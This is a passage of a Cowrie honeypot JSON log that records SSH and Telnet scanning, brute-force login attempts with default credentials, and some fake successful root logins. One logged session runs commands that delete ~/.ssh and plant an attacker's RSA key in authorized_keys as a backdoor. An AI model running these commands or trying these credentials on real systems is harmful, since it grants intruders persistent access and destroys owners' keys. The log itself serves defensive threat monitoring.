es256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T05:52:06.565073Z","src_ip":"64.226.115.244","session":"8a8409610b0f"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T05:52:07.282393Z","src_ip":"64.226.115.244","session":"8a8409610b0f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:52:07.283931Z","src_ip":"64.226.115.244","session":"8a8409610b0f"}
{"eventid":"cowrie.session.connect","src_ip":"116.74.71.3","src_port":52420,"dst_ip":"1.2.3.4","dst_port":23,"session":"66127f098481","protocol":"telnet","message":"New connection: 116.74.71.3:52420 (1.2.3.4:23) [session: 66127f098481]","sensor":"my-vps","timestamp":"2025-08-26T05:52:18.919565Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60874,"dst_ip":"1.2.3.4","dst_port":22,"session":"10494a2cb121","protocol":"ssh","message":"New connection: 217.72.205.35:60874 (1.2.3.4:22) [session: 10494a2cb121]","sensor":"my-vps","timestamp":"2025-08-26T05:52:19.142018Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:52:19.143139Z","src_ip":"217.72.205.35","session":"10494a2cb121"}
{"eventid":"cowrie.session.closed","duration":14.26670217514038,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:52:33.186187Z","src_ip":"116.74.71.3","session":"66127f098481"}
{"eventid":"cowrie.session.connect","src_ip":"198.12.114.232","src_port":37886,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0dfa36c2549","protocol":"ssh","message":"New connection: 198.12.114.232:37886 (1.2.3.4:22) [session: b0dfa36c2549]","sensor":"my-vps","timestamp":"2025-08-26T05:52:57.170761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:52:57.171607Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:52:57.346974Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.login.success","username":"root","password":"qazwsx123!","message":"login attempt [root/qazwsx123!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:52:58.084709Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:52:58.494455Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:52:58.495212Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:52:58.496045Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:52:58.670753Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:52:59.034193Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:52:59.035001Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:52:59.211037Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:52:59.212123Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.session.connect","src_ip":"198.12.114.232","src_port":37888,"dst_ip":"1.2.3.4","dst_port":22,"session":"82fb5a5a1766","protocol":"ssh","message":"New connection: 198.12.114.232:37888 (1.2.3.4:22) [session: 82fb5a5a1766]","sensor":"my-vps","timestamp":"2025-08-26T05:52:59.376133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:52:59.377096Z","src_ip":"198.12.114.232","session":"82fb5a5a1766"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:52:59.545306Z","src_ip":"198.12.114.232","session":"82fb5a5a1766"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:53:00.261070Z","src_ip":"198.12.114.232","session":"82fb5a5a1766"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:53:01.432712Z","src_ip":"198.12.114.232","session":"82fb5a5a1766"}
{"eventid":"cowrie.session.connect","src_ip":"198.12.114.232","src_port":37902,"dst_ip":"1.2.3.4","dst_port":22,"session":"280038300496","protocol":"ssh","message":"New connection: 198.12.114.232:37902 (1.2.3.4:22) [session: 280038300496]","sensor":"my-vps","timestamp":"2025-08-26T05:53:01.605660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:53:01.606713Z","src_ip":"198.12.114.232","session":"280038300496"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:53:01.777868Z","src_ip":"198.12.114.232","session":"280038300496"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:53:02.504045Z","src_ip":"198.12.114.232","session":"280038300496"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:53:02.675789Z","src_ip":"198.12.114.232","session":"b0dfa36c2549"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:53:02.676825Z","src_ip":"198.12.114.232","session":"280038300496"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":49386,"dst_ip":"1.2.3.4","dst_port":23,"session":"4e8493215560","protocol":"telnet","message":"New connection: 79.124.8.120:49386 (1.2.3.4:23) [session: 4e8493215560]","sensor":"my-vps","timestamp":"2025-08-26T05:53:15.061701Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:53:15.101383Z","src_ip":"79.124.8.120","session":"4e8493215560"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:53:15.161403Z","src_ip":"79.124.8.120","session":"4e8493215560"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:53:43.787529Z","src_ip":"212.227.125.160","session":"2d790a008933"}
{"eventid":"cowrie.session.closed","duration":180.13369846343994,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:53:43.792598Z","src_ip":"212.227.125.160","session":"2d790a008933"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":34622,"dst_ip":"1.2.3.4","dst_port":22,"session":"396a0bccab90","protocol":"ssh","message":"New connection: 134.199.225.42:34622 (1.2.3.4:22) [session: 396a0bccab90]","sensor":"my-vps","timestamp":"2025-08-26T05:53:54.372389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:53:54.373375Z","src_ip":"134.199.225.42","session":"396a0bccab90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:53:54.530197Z","src_ip":"134.199.225.42","session":"396a0bccab90"}
{"eventid":"cowrie.login.failed","username":"openkm","password":"openkm123","message":"login attempt [openkm/openkm123] failed","sensor":"my-vps","timestamp":"2025-08-26T05:53:55.159866Z","src_ip":"134.199.225.42","session":"396a0bccab90"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:53:56.319836Z","src_ip":"134.199.225.42","session":"396a0bccab90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8339,"dst_ip":"1.2.3.4","dst_port":22,"session":"75f8d490de67","protocol":"ssh","message":"New connection: 212.227.235.229:8339 (1.2.3.4:22) [session: 75f8d490de67]","sensor":"my-vps","timestamp":"2025-08-26T05:54:17.224621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T05:54:17.225917Z","src_ip":"212.227.235.229","session":"75f8d490de67"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T05:54:17.351195Z","src_ip":"212.227.235.229","session":"75f8d490de67"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1122","message":"login attempt [ubnt/1122] failed","sensor":"my-vps","timestamp":"2025-08-26T05:54:18.323715Z","src_ip":"212.227.235.229","session":"75f8d490de67"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt1234","message":"login attempt [ubnt/ubnt1234] failed","sensor":"my-vps","timestamp":"2025-08-26T05:54:19.451113Z","src_ip":"212.227.235.229","session":"75f8d490de67"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"fA0fO5gQ8bJ7rJ9","message":"login attempt [ubnt/fA0fO5gQ8bJ7rJ9] failed","sensor":"my-vps","timestamp":"2025-08-26T05:54:20.579284Z","src_ip":"212.227.235.229","session":"75f8d490de67"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin123","message":"login attempt [ubnt/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T05:54:21.707417Z","src_ip":"212.227.235.229","session":"75f8d490de67"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"","message":"login attempt [ubnt/] failed","sensor":"my-vps","timestamp":"2025-08-26T05:54:22.835512Z","src_ip":"212.227.235.229","session":"75f8d490de67"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:54:23.963567Z","src_ip":"212.227.235.229","session":"75f8d490de67"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":37640,"dst_ip":"1.2.3.4","dst_port":22,"session":"72504fd1d70f","protocol":"ssh","message":"New connection: 134.199.225.42:37640 (1.2.3.4:22) [session: 72504fd1d70f]","sensor":"my-vps","timestamp":"2025-08-26T05:54:58.100183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:54:58.101214Z","src_ip":"134.199.225.42","session":"72504fd1d70f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:54:58.259821Z","src_ip":"134.199.225.42","session":"72504fd1d70f"}
{"eventid":"cowrie.login.failed","username":"delegate","password":"123456","message":"login attempt [delegate/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T05:54:58.937088Z","src_ip":"134.199.225.42","session":"72504fd1d70f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:55:00.098480Z","src_ip":"134.199.225.42","session":"72504fd1d70f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35070,"dst_ip":"1.2.3.4","dst_port":22,"session":"12d0db54caec","protocol":"ssh","message":"New connection: 212.227.235.229:35070 (1.2.3.4:22) [session: 12d0db54caec]","sensor":"my-vps","timestamp":"2025-08-26T05:55:33.537480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:55:33.981097Z","src_ip":"212.227.235.229","session":"12d0db54caec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"m